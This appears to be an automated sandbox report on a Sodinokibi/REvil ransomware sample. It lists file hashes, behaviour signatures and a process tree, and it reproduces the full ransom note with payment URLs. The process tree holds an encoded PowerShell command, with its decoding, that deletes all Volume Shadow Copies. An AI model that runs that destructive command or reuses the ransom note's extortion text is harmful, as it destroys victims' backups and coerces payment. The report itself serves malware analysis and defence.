Analysis

  • max time kernel
    118s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/06/2024, 11:58

General

  • Target

    ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

  • Size

    115KB

  • MD5

    63a945da1a63a8e56e8220c4ccf7fd0c

  • SHA1

    a99cf1a2426edeac97c789d0a4b7d38606d7aa45

  • SHA256

    ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195

  • SHA512

    34006d84587ea90e243ebe0dd6bde8bd502ed688001a412898cd4e4c16a5de5788a9fa4c53d3ea79e4307adaa74496e05b205bf9717ac833db976551b1a7c89c

  • SSDEEP

    1536:ikB/Ih3+7QuoZVQgf5GV2jSzGpAyZ4ICS4AwnfxnuLdSbSmoNUExd9M4dgS:gFW7gSzKDin5nWhw4dgS

Score
10/10

Malware Config

Extracted

Path

C:\Users\pj328zw1-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension pj328zw1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom.

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/881AF8D02A6585AE
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/881AF8D02A6585AE
Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:
P58HocFcL5wyWYov4mRqXGXpxKFdz+xYKJuApYSBVc25/ROE6RCnEsJ8ID12nRrS Z9orJyTR6maEDn1eNqxJ7T/Cy5HwJZ7u66nPLwrNgSu/WCYzrZ6uywEGsJKAFR4E 0+kMfG4NDO0leecS75pCX0t7qXpZ5g3Y5zUSYuh50QQuv/QxQuImBfmuIxtAEtCD 30zP+0dv3Q48RVkxkqoBEIUhm9v5RrxzjrU8Pk0A7LQP46fQwQ3kiwtjgzAqJydQ 4kf4X0hdj2+0ga3/P5f15uVz3NSA+ax25BX101OlhkYnJGg3t01o+frOsPyrdj7Z L2ATTEUpzBxRZumXfVkJbscqHABv18hhI6WqHlNdzLs+XauBxEgs0gxHAz1HFyAw rj+cS57bkQ6E20f0Wb0WVYh8Gk3+CiCGNgirPPykcvzwgQdxH+BOFFWG7n4YWkMY gfkDO/V0223K13WAKDVVVm795FKrTAhX3j1jlmYsVOoYTK9j8p925aRhrmMMQYo+ fPEbu64T37jHt6BpGfvurEwCnAs0qtqv5nvjxRTpUSn53S3ATZxu12g5CzfXvq19 +I5g/89aLQ1jS9EdDsmQAZVOoJDOfy2zkcWf37S1WFSBwJy5e7JC2bZN2Wg41GUU fndeL9r/wQPyw3FYO5wbLr5a3eLq8TREleHMK0hS4GGfXzOTGv/Db6WzfKKxzo+u CrPFiiNVQisGjVW5vJSVZ12zrO8dS6kS7nhQYz7YUcnjESA5MRkClY+61xU2Nx9+ PJ63CTCH2S89TCgQdkxngW4p7Bt9slfUcs7BuFG/3k2zBwr0xirn5DDwDx+ogofK fQ5C78UToQgjCe/rjn891N2bA+iWSI1+3RoQnEoaarZwCu+0YkbegVIBu/9zJ3cl EZQQg0rTiv33vddL8dB5PA8DY3QqefZCtNewtiqjGpQDhg8OszZDWZgSxBfG6F9/ EsoxiFtjqskHvWb+jwERlctQQLYrkdObF8kQngBijB0hKLK+w+05V6QVf7dqCiUK sWrtls6O6WD4Q0UvxU/C9kQJuMTyVP0dLHLqIRGh7NyIDUtIarZZMWFrVTTuxHTg XUKGjMzIWNGJhhM7VTHM35lqriAP1LnEU+mO/i9LEXsksgzNaSH2iMjX6rUV18Vy ucTM5+NW5FiaF1CtPPqjO2arnbKB9A56/mGguTI1sxfMVkdKQ8z8bQ9SIYKI/iA1 jRvQ4lJzfFgB39vgdSVQEQ0s5ut8EempcqyTlf0mPasV2PCxru2VeG267MofTcFR haua2TKKZVFb+GaZGXPpOtkAPvGchRFURe95j1KaUXNYrbXAblLeRR0o95X08Hdw 33QEykuhp/xoJlj9ob7mQmT2zSQD/L4NW2d/yj0o77WEWdW3
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/881AF8D02A6585AE

http://decryptor.cc/881AF8D02A6585AE

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
    "C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64; it decodes to "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", i.e. deletion of all Volume Shadow Copies via WMI, which accounts for the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe process below)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2292
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\pj328zw1-readme.txt
      1⤵
        PID:928

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\pj328zw1-readme.txt

    Filesize

    7KB

    MD5

    bda9f40c62f826d48eff2187c1059384

    SHA1

    f00a3f1c1422f04b8148b8942449e563db83674f

    SHA256

    27260b742669db983a30060b75e5aadddfe4ba06b85f293c2320c8367bd6177f

    SHA512

    0f37f52f703e7596cc3863ed33d48a93baa80b2d7cce2a0d898f1074e882815778eaa0e553f8421d4d4214594c7eb40e68e605c4933651cfc42bbd342711bc31

  • memory/2944-4-0x000007FEF5EFE000-0x000007FEF5EFF000-memory.dmp

    Filesize

    4KB

  • memory/2944-5-0x000000001B280000-0x000000001B562000-memory.dmp

    Filesize

    2.9MB

  • memory/2944-6-0x0000000002010000-0x0000000002018000-memory.dmp

    Filesize

    32KB

  • memory/2944-7-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2944-8-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2944-9-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2944-10-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2944-11-0x000007FEF5C40000-0x000007FEF65DD000-memory.dmp

    Filesize

    9.6MB